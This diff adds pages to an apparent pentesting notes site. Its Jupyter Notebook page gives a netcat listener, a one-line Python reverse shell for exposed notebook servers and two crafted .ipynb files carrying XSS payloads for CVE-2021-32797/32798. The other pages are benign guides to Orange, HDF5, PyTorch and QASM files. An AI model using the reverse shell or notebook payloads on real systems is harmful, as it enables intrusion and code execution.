Exploit Notes 3

Exploit Notes 3

machine-learning/Jupyter-Notebook-Pentesting.md

@@ -0,0 +1,199 @@
+---
+title: Jupyter Notebook Pentesting
+description: Jupyter notebook is a web-based interactive computing platform. It’s often used for machine learning, data science, etc. It runs locally at 127.0.0.1:8888 by default.
+tags: 
+    - Machine Learning
+refs:
+date: 2023-06-19
+draft: false
+---
+
+<div data-pagefind-ignore>
+
+## Run Notebook Server Locally
+
+```bash
+# For Jupyterlab (more advanced than notebook)
+pip install jupyterlab
+jupyter-lab
+# Specify the token
+jupyter-lab --NotebookApp.token=abcdef...
+
+# For Notebook (classic)
+pip install notebook
+jupyter notebook
+# Specify the token
+jupyter notebook --NotebookApp.token=abcdef...
+```
+
+After that, we can access to `http://127.0.0.1:8888/` in browser.
+
+<br />
+
+## Authorization with Token
+
+Reference: [https://jupyter-notebook.readthedocs.io/en/stable/security.html](https://jupyter-notebook.readthedocs.io/en/stable/security.html)
+
+If we have the token for Jupyter notebook server, we can authorize it by adding the token in the “Authorization” HTTP header.
+
+```bash
+Authorization: token abcdef...
+```
+
+Or we can also add the token to URL parameter.
+
+```bash
+https://my-notebook/tree/?token=abcdef...
+```
+
+Or directly input the login form.
+
+<br />
+
+## Common Directories
+
+```bash
+/api/kernelspecs
+```
+
+<br />
+
+## Remote Code Execution (RCE)
+
+If the target machine opens the Jupyter notebook server then we can access to it from outside, we can simply execute arbitrary Python script in notebook. In short, we can get a shell by reverse shell!    
+First off, start a listener in local machine.
+
+```bash
+nc -lvnp 4444
+```
+
+After that, open some **`.ipynb`** file in Jupyter notebook top page, then input the following script and run.
+
+```bash
+import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")
+```
+
+We should get a shell in local terminal.
+
+<br />
+
+## .ipynb RCE (**CVE-2021-32797, CVE-2021-32798)**
+
+Reference: [https://github.com/google/security-research/security/advisories/GHSA-c469-p3jp-2vhx](https://github.com/google/security-research/security/advisories/GHSA-c469-p3jp-2vhx)
+
+We can inject arbitrary code in `.ipynb` file. Create the following file e.g. “exploit.ipynb” then upload it to Jupyter Notebook directory.
+
+- **Jupyter Notebook**
+
+```json
+{
+ "cells": [
+  {
+   "cell_type": "code",
+   "execution_count": 0,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<select><iframe></select><img src=x: onerror=alert('xss')>\n"],
+      "text/plain": []
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    ""
+   ]
+  }
+ ],
+ "metadata": {
+  "kernelspec": {
+   "display_name": "Python 3",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.9.6"
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 5
+}
+```
+
+- **Jupyter Lab**
+
+```json
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<label for=buttonid style=\"cursor: text\">not safe to click here</label>\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {
+    "highlighter": "codemirror"
+   },
+   "source": "<div class=\"jp-InputArea-editor\"><div class=\"CodeMirror cm-s-jupyter\"><div class=\"CodeMirror-scroll\"><div class=\"CodeMirror-sizer\"><div style=\"top:0px; position:relative\"><div class=\"CodeMirror-lines\"><div style=\"outline:none; position:relative\"><div class=\"CodeMirror-code\"><div style=\"position: relative\"><label for=buttonid style=\"cursor: text\"><pre class=\"CodeMirror-line\" style=\"background:transparent\"><span style=\"padding-right: 0.1px\"><span class=\"cm-builtin\">print</span>(<span class=\"cm-string\">&quot;Also not safe to click here&quot;</span>)</span></pre></label></div></div></div></div></div></div></div></div></div>"
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 0,
+   "metadata": {
+    "xrender": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<form id=jp-mk-edit action='javascript:alert(1)' style='display:none'><button type=submit id=buttonid></form>\n"
+      ],
+      "text/plain": []
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": ""
+  }
+ ],
+ "metadata": {
+  "kernelspec": {
+   "display_name": "Python 3",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.9.6"
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 5
+}
+```
+
+</div>

machine-learning/Orange-Data-Mining.md

@@ -0,0 +1,41 @@
+---
+title: Orange Data Mining
+description: Orange is a data-mining and machine learning software that allows users to analyze data, create visualizations, and build predictive models.
+tags: 
+    - Machine Learning
+refs:
+    - https://orange3.readthedocs.io/projects/orange-visual-programming/en/latest/index.html
+date: 2023-03-20
+draft: false
+---
+
+## Installation & Start
+
+To install Orange, we can install it with pip in Linux.
+
+```bash
+pip install PyQt5 PyQtWebEngine
+pip install orange3
+```
+
+<br />
+
+## Basic Usage
+
+### 1. Start Orange Software
+
+```bash
+python -m Orange.canvas
+```
+
+### 2. Open .OWS File
+
+When the Orange starts, open the “.ows” file.
+
+### 3. Import Data File
+
+Add the File widget in the left pane, and import data file such as “.csv”.
+
+### 4. Workflows
+
+Connect the File widget with the Scatter Plot widget and open the Scatter Plot. We can see the data with plot.

machine-learning/Read-HDF5-File.md

@@ -0,0 +1,60 @@
+---
+title: Read HDF5 (H5) File
+description: HDF5 is a file format of the HDF (Hierarchical Data Format) which is designed to store and organize large amounts of data.
+tags: 
+    - Machine Learning
+refs:
+    - https://docs.h5py.org/en/latest/quick.html
+    - https://stackoverflow.com/questions/28170623/how-to-read-hdf5-files-in-python
+date: 2023-03-26
+draft: false
+---
+
+## TensorFlow
+
+```python
+import tensorflow as tf
+
+model = tf.keras.models.load_model("example.h5")
+model.summary()
+```
+
+<br />
+
+## h5py
+
+**h5py** is the Python library to read and write HDF5 files.  
+
+### Installation
+
+```bash
+pip3 install h5py
+```
+
+### Read HDF5 (H5)
+
+Then run the following script.
+
+```python
+import h5py
+
+with h5py.File('example.hdf5', 'r') as f:
+	# Get all keys
+	print("All keys: %s" % f.keys())
+	# Get an object
+	print("Object: " % f["key_name"])
+	print("Object keys: " % f["key_name"].keys())
+	print("Sub object: " % f["key_name"]["sub_key_name"])
+```
+
+### Write HDF5 (H5)
+
+```python
+import h5py
+import numpy as np
+
+data_matrix = np.random.uniform(-1, 1, size=(10, 3))
+
+with h5py.File('example.hdf5', 'w') as f:
+	f.create_dataset("dataset_name", data=data_matrix)
+```

machine-learning/Read-PT.md

@@ -0,0 +1,34 @@
+---
+title: Read PT File
+description: A PT file is a machine learning model file generated by PyTorch.
+tags: 
+    - Machine Learning
+refs:
+date: 2023-03-26
+draft: false
+---
+
+## Load Model from PT
+
+```python
+import torch
+import torch.nn as nn
+
+class ExampleModel(nn.Module):
+    def __init__(self):
+        super().__init__()
+        self.flatten = nn.Flatten()
+        self.linear_relu_stack = nn.Sequential(
+            nn.Linear(28*28, 512),
+            nn.ReLU(),
+            nn.Linear(512, 10))
+
+    def forward(self, x):
+        x = self.flatten(x)
+        logits = self.linear_relu_stack(x)
+        return logits
+
+model = ExampleModel()
+model.load_state_dict(torch.load('example.pt'))
+print(model)
+```

machine-learning/Read-QASM.md

@@ -0,0 +1,35 @@
+---
+title: Read QASM
+description: QASM (Quantum Assembly Language) is a language used to program quantum computers. It is similar in concept to assembly language used in classical computers, but instead of operating on bits, QASM operates on quantum bits (qubits).
+tags: 
+    - Machine Learning
+refs:
+    - https://github.com/Taoudi/Cyber_Apocalypse/blob/main/HTB.ipynb
+date: 2023-03-26
+draft: false
+---
+
+## Install Qiskit
+
+```python
+pip install oqi qiskit
+```
+
+<br />
+
+## Read QASM
+
+```python
+from qiskit import QuantumCircuit, transpile
+from qiskit.providers.aer import QasmSimulator
+from qiskit.visualization import plot_histogram
+
+simulator = QasmSimulator()
+circuit = QuantumCircuit.from_qasm_file('example.qasm')
+compiled_circuit = transpile(circuit, simulator)
+job = simulator.run(compiled_circuit, shots=1000)
+result = job.result()
+
+counts = result.get_counts(compiled_circuit)
+print(counts)
+```

machine-learning/_data.yml

@@ -0,0 +1,12 @@
+category1: machine-learning
+related_menus:
+  - title: Data Processing
+    id: data-processing
+  - title: Computer Vision
+    id: computer-vision
+  - title: LLM
+    id: llm
+  - title: Model
+    id: model
+  - title: Others
+    id: others